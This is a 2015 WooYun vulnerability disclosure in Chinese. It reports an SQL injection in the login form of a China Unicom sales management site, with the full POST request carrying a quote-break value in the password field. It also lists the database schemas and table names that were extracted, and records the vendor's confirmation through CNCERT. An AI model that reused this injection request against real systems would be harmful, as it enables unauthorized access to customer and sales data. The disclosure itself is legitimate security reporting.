当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128997

漏洞标题:联通某管理系统SQL注入(26个数据库)

相关厂商:中国联通

漏洞作者: fuzz-ing

提交时间:2015-07-24 22:56

修复时间:2015-09-12 09:48

公开时间:2015-09-12 09:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-24: 细节已通知厂商并且等待厂商处理中
2015-07-29: 厂商已经确认,细节仅向厂商公开
2015-08-08: 细节向核心白帽子及相关领域专家公开
2015-08-18: 细节向普通白帽子公开
2015-08-28: 细节向实习白帽子公开
2015-09-12: 细节向公众公开

简要描述:

详细说明:

hzuni.com 分号直接报错,oracle数据库
注入点

POST /login.aspx HTTP/1.1
Content-Length: 273
Content-Type: application/x-www-form-urlencoded
Referer: http://www.hzuni.com:80/
Cookie: ASP.NET_SessionId=dkyh4uargkdmq2jxliodf0og
Host: www.hzuni.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
k_dl=%b5%c7%20%c2%bd&k_oper_no=1&k_password=1'%22&__EVENTVALIDATION=/wEWBQLB2p2YAgK//IzYCAK7q7GGCAKv8qzaCAK7mcHoBdUdQobtzDCauXy6ZUoLxbWt8NyRLjGVjEaWs6dlEMN0&__VIEWSTATE=/wEPDwUJMTg4MDQ2NzE3ZGTyjyjn0%2bEPTAtNrvNvPUg2wPaZaro0e9743TDSuBngrA%3d%3d&__VIEWSTATEGENERATOR=C2EE9ABB


26个数据库

[*] APEX_030200
[*] APP_CY
[*] APPQOSSYS
[*] BS_TEST
[*] BUS_SALE
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] HZAPP
[*] LBACSYS
[*] LOCAL_CDC
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] REPORT
[*] SALARY
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
[*] ZHWJ_MOB


一个渠道数据库中的表,见下证明

漏洞证明:

Database: BUS_SALE
[75 tables]
+--------------------------+
| BS_AGENT_INFO |
| BS_AGENT_INFO_TRADE |
| BS_CARD_ASSIGN_LOG |
| BS_CARD_ASSIGN_LOG_TEMP |
| BS_CARD_IDLE |
| BS_CARD_IDLE_TEMP |
| BS_CARD_PINT |
| BS_CARD_TEMP |
| BS_CARD_USE |
| BS_DATA_TEMP |
| BS_DEV_INFO |
| BS_DEV_INFO_TRADE |
| BS_GRID_INFO |
| BS_GRID_INFO_RELATION |
| BS_ID_INFO |
| BS_ID_INFO_TRADE |
| BS_JF_PARA |
| BS_JF_WRITEOFF |
| BS_JF_WRITEOFF_TMP |
| BS_LOG |
| BS_MAN_MOB_DEV_D |
| BS_MONTH |
| BS_NET_CELL_INFO |
| BS_NET_FILE |
| BS_NET_INFO |
| BS_NET_INFO_LOG |
| BS_NET_INFO_NEW |
| BS_NET_INFO_NEW_TRADE |
| BS_ORDER |
| BS_ORDER_LOG |
| BS_PACKAGE |
| BS_PACKAGE_GOODS |
| BS_PACKAGE_IDLE |
| BS_PACKAGE_IDLE_TEMP |
| BS_PACK_ORDER_STAT |
| BS_PARENT_CHILD |
| BS_PRODURE_LOG |
| BS_QD_CLEAR |
| BS_RELATION_DATA |
| BS_RES_GRID_INFO |
| BS_REW_APPLY_DATA |
| BS_SALES_REPORT_M |
| BS_SALE_CZ_M |
| BS_SALE_PRODUCRE_LOG |
| BS_SALE_YC_D |
| BS_SELLER |
| BS_SELLER_ACCOUNTDEPOSIT |
| BS_SELLER_SALES_REP_D |
| BS_SELLER_TEMP |
| BS_SELL_USERS |
| BS_STOCK_SALES_REP_D |
| BS_STOCK_SALES_REP_D_TMP |
| BS_STOCK_SALES_REP_M |
| BS_STOCK_SALES_REP_M_TMP |
| BS_T0_REPORT_D |
| BS_T0_REPORT_D_TEMP |
| BS_T1_REPORT_D |
| BS_T1_REPORT_D_TEMP |
| BS_TASK_UNIT_INFO |
| BS_TASK_UNIT_INFO_TRADE |
| BS_TD_M_DEPART |
| BS_TF_F_USER |
| BS_TRADE |
| BS_TRADE_LOG |
| BS_TRADE_SUB_ITEM |
| BS_TRADE_SUB_ITEM_T |
| BS_TRADE_T |
| BS_YS_SALE |
| HZ_AGENT_JF_RIGHT_MONTH |
| HZ_CZ_DETAIL_LIST |
| LJCH_TEMP |
| TD_B_RESNUMRULE |
| TF_R_SIMCARD_USE |
| YJ_CARD_2G_ALL |
| YJ_CARD_2G_CHECK |
+--------------------------+

修复方案:

版权声明:转载请注明来源 fuzz-ing@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-07-29 09:47

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给广东分中心,由其后续协调网站管理单位处置.

最新状态:

暂无


漏洞评价:

评论